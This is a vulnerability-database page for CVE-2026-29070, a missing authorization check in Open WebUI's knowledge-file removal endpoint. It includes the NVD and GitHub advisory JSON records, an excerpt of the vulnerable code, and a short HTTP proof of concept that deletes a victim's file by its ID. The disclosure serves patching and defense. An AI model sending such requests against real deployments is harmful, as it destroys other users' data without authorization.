Vulnerability-Lookup

CVE-2026-29070 (GCVE-0-2026-29070)

Vulnerability from cvelistv5 – Published: 2026-03-26 23:39 – Updated: 2026-03-26 23:39

Title

Open WebUI has unauthorized deletion of knowledge files

Summary

Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, an access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id). Version 0.8.6 patches the issue.

Severity ?

5.4 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

CWE

CWE-862 - Missing Authorization

Assigner

GitHub_M

References

URL

Tags

https://github.com/open-webui/open-webui/security…

x_refsource_CONFIRM

Impacted products

	Vendor	Product	Version
	open-webui	open-webui	Affected: < 0.8.6

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "cna": {
      "affected": [
        {
          "product": "open-webui",
          "vendor": "open-webui",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 0.8.6"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, an access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id). Version 0.8.6 patches the issue."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "LOW",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-862",
              "description": "CWE-862: Missing Authorization",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-03-26T23:39:33.197Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/open-webui/open-webui/security/advisories/GHSA-26gm-93rw-cchf",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-26gm-93rw-cchf"
        }
      ],
      "source": {
        "advisory": "GHSA-26gm-93rw-cchf",
        "discovery": "UNKNOWN"
      },
      "title": "Open WebUI has unauthorized deletion of knowledge files"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-29070",
    "datePublished": "2026-03-26T23:39:33.197Z",
    "dateReserved": "2026-03-03T20:51:43.482Z",
    "dateUpdated": "2026-03-26T23:39:33.197Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-29070\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-03-27T00:16:22.823\",\"lastModified\":\"2026-03-27T00:16:22.823\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, an access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id). Version 0.8.6 patches the issue.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L\",\"baseScore\":5.4,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"LOW\",\"availabilityImpact\":\"LOW\"},\"exploitabilityScore\":2.8,\"impactScore\":2.5}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-862\"}]}],\"references\":[{\"url\":\"https://github.com/open-webui/open-webui/security/advisories/GHSA-26gm-93rw-cchf\",\"source\":\"security-advisories@github.com\"}]}}"
  }
}

FKIE_CVE-2026-29070

Vulnerability from fkie_nvd - Published: 2026-03-27 00:16 - Updated: 2026-03-27 00:16

Severity ?

5.4 (Medium) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/open-webui/open-webui/security/advisories/GHSA-26gm-93rw-cchf

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.6, an access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id). Version 0.8.6 patches the issue."
    }
  ],
  "id": "CVE-2026-29070",
  "lastModified": "2026-03-27T00:16:22.823",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "LOW",
          "baseScore": 5.4,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "LOW",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 2.5,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-03-27T00:16:22.823",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-26gm-93rw-cchf"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-862"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-26GM-93RW-CCHF

Vulnerability from github – Published: 2026-03-27 15:35 – Updated: 2026-03-27 15:35

Summary

Open WebUI has unauthorized deletion of knowledge files

Details

Summary

An access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id)

Details

The source code at https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/knowledge.py#L803 does not properly validate that the file being deleted belongs to the current knowledge base:

@router.post("/{id}/file/remove", response_model=Optional[KnowledgeFilesResponse])
def remove_file_from_knowledge_by_id(
    id: str,
    form_data: KnowledgeFileIdForm,
    delete_file: bool = Query(True),
    user=Depends(get_verified_user),
    db: Session = Depends(get_session),
):
    knowledge = Knowledges.get_knowledge_by_id(id=id, db=db)
    [...]
    # Note  : Access control check on the knowledge base
    if (
        knowledge.user_id != user.id
        and not AccessGrants.has_access(
            user_id=user.id,
            resource_type="knowledge",
            resource_id=knowledge.id,
            permission="write",
            db=db,
        )
        and user.role != "admin"
    ):
        raise HTTPException(
            status_code=status.HTTP_400_BAD_REQUEST,
            detail=ERROR_MESSAGES.ACCESS_PROHIBITED,
        )

    file = Files.get_file_by_id(form_data.file_id, db=db)
    [...]
    # Note : No checks on the file

    if delete_file:
        try:
            # Remove the file's collection from vector database
            file_collection = f"file-{form_data.file_id}"
            if VECTOR_DB_CLIENT.has_collection(collection_name=file_collection):
                VECTOR_DB_CLIENT.delete_collection(collection_name=file_collection)
        except Exception as e:
            log.debug("This was most likely caused by bypassing embedding processing")
            log.debug(e)
            pass

        # Delete file from database
        Files.delete_file_by_id(form_data.file_id, db=db)
[...]

PoC

Victim has a knowledge base with a file (id: 9db6dcee-bb3b-483e-aaf3-310fda366af1) Attacker creates their own collection (id: dde9e2b6-21c9-4aa1-a1cf-8cb0e4392f2b) Attacker deletes the victim file from their own collection:

POST /api/v1/knowledge/dde9e2b6-21c9-4aa1-a1cf-8cb0e4392f2b/file/remove HTTP/1.1
Host: gaius-neo-val.fr.space.corp
Authorization: Bearer eyJhbGciOiJIUzI1[...]nHiaod-3vfNE0
[...]

{"file_id":"9db6dcee-bb3b-483e-aaf3-310fda366af1"}

-----

HTTP/1.1 200 OK
[...]

The file is then deleted from the victim's knowledge base.

Impact

Arbitrary file deletion

Severity ?

5.4 (Medium)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "open-webui"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.8.6"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-29070"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-27T15:35:19Z",
    "nvd_published_at": "2026-03-27T00:16:22Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nAn access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id)\n\n### Details\nThe source code at https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/knowledge.py#L803 does not properly validate that the file being deleted belongs to the current knowledge base:\n```\n@router.post(\"/{id}/file/remove\", response_model=Optional[KnowledgeFilesResponse])\ndef remove_file_from_knowledge_by_id(\n    id: str,\n    form_data: KnowledgeFileIdForm,\n    delete_file: bool = Query(True),\n    user=Depends(get_verified_user),\n    db: Session = Depends(get_session),\n):\n    knowledge = Knowledges.get_knowledge_by_id(id=id, db=db)\n    [...]\n    # Note  : Access control check on the knowledge base\n    if (\n        knowledge.user_id != user.id\n        and not AccessGrants.has_access(\n            user_id=user.id,\n            resource_type=\"knowledge\",\n            resource_id=knowledge.id,\n            permission=\"write\",\n            db=db,\n        )\n        and user.role != \"admin\"\n    ):\n        raise HTTPException(\n            status_code=status.HTTP_400_BAD_REQUEST,\n            detail=ERROR_MESSAGES.ACCESS_PROHIBITED,\n        )\n\n    file = Files.get_file_by_id(form_data.file_id, db=db)\n    [...]\n    # Note : No checks on the file\n\n    if delete_file:\n        try:\n            # Remove the file\u0027s collection from vector database\n            file_collection = f\"file-{form_data.file_id}\"\n            if VECTOR_DB_CLIENT.has_collection(collection_name=file_collection):\n                VECTOR_DB_CLIENT.delete_collection(collection_name=file_collection)\n        except Exception as e:\n            log.debug(\"This was most likely caused by bypassing embedding processing\")\n            log.debug(e)\n            pass\n\n        # Delete file from database\n        Files.delete_file_by_id(form_data.file_id, db=db)\n[...]\n```\n\n### PoC\nVictim has a knowledge base with a file (id: 9db6dcee-bb3b-483e-aaf3-310fda366af1)\nAttacker creates their own collection (id: dde9e2b6-21c9-4aa1-a1cf-8cb0e4392f2b)\nAttacker deletes the victim file from their own collection:\n```\nPOST /api/v1/knowledge/dde9e2b6-21c9-4aa1-a1cf-8cb0e4392f2b/file/remove HTTP/1.1\nHost: gaius-neo-val.fr.space.corp\nAuthorization: Bearer eyJhbGciOiJIUzI1[...]nHiaod-3vfNE0\n[...]\n\n{\"file_id\":\"9db6dcee-bb3b-483e-aaf3-310fda366af1\"}\n\n-----\n\nHTTP/1.1 200 OK\n[...]\n```\nThe file is then deleted from the victim\u0027s knowledge base.\n\n\n### Impact\nArbitrary file deletion",
  "id": "GHSA-26gm-93rw-cchf",
  "modified": "2026-03-27T15:35:19Z",
  "published": "2026-03-27T15:35:19Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/security/advisories/GHSA-26gm-93rw-cchf"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29070"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/open-webui/open-webui"
    },
    {
      "type": "WEB",
      "url": "https://github.com/open-webui/open-webui/blob/main/backend/open_webui/routers/knowledge.py#L803"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Open WebUI has unauthorized deletion of knowledge files"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-29070 (GCVE-0-2026-29070)

FKIE_CVE-2026-29070

GHSA-26GM-93RW-CCHF

Summary

Details

PoC

Impact

Tags

Sightings

Nomenclature